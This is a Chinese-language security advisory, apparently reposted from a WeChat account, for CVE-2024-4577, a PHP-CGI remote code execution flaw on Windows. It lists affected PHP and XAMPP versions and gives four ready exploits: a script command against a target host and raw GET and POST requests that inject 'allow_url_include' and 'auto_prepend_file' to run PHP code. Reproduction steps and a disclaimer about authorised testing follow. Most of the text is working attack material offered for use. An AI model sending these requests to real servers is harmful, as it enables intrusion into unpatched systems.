CVE-2024-4577-PHP-RCE![(CVE-2024-4577) 安全通告-附poc/exp (CVE-2024-4577) 安全通告-附poc/exp]()
信息 | 内容 |
---|---|
漏洞名称 | PHP RCE |
漏洞编号 | CVE-2024-4577 |
风险等级 | 高危 |
漏洞类型 | RCE |
利用难度 | 低 |
影响版本
-
PHP Windows版 8.3.0 <= 影响版本 < 8.3.8
-
PHP Windows版 8.2.0 <= 影响版本 < 8.2.20
-
PHP Windows版 8.1.0 <= 影响版本 < 8.1.29
-
PHP Windows版 影响版本 == 8.0.x
-
PHP Windows版 影响版本 == 7.x
-
PHP Windows版 影响版本 == 5.x
-
XAMPP Windows版 8.2.0 <= 影响版本 <= 8.2.12
-
XAMPP Windows版 8.1.0 <= 影响版本 <= 8.1.25
-
XAMPP Windows版 影响版本 == 8.0.x
-
XAMPP Windows版 影响版本 == 7.x
-
XAMPP Windows版 影响版本 == 5.x
EXP 1
可用于绕过WAF场景 + 默认场景:
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
例如:
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
EXP 2
可用于SSRF场景 + 默认场景:
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
EXP 3
可用于默认场景:
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
die("Te"."sT");
EXP 4
可用于默认场景:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN
<?php die("Te"."sT");?>
复现
-
服务端环境:
XAMPP Windows版 8.2.12
-
服务端下载并安装 XAMPP:
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
或者自主去这里挑受影响版本:https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
-
服务端配置
无需任何修改,保持默认配置
-
客户端使用EXP
使用上述EXP进行测试
-
验证
观察是否返回字符串 "TesT" 或者服务端system.ini文件内容
下载地址:https://github.com/xcanwin/CVE-2024-4577-PHP-RCE
公众号技术文章仅供诸位网络安全工程师对自己所管辖的网站、服务器、网络进行检测或维护时参考用,公众号的检测工具仅供各大安全公司的安全测试员安全测试使用。未经允许请勿利用文章里的技术资料对任何外部计算机系统进行入侵攻击,公众号的各类工具均不得用于任何非授权形式的安全测试。公众号仅提供技术交流,不对任何成员利用技术文章或者检测工具造成任何理论上的或实际上的损失承担责任。
原文始发于微信公众号(TKing的安全圈):(CVE-2024-4577) 安全通告-附poc/exp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论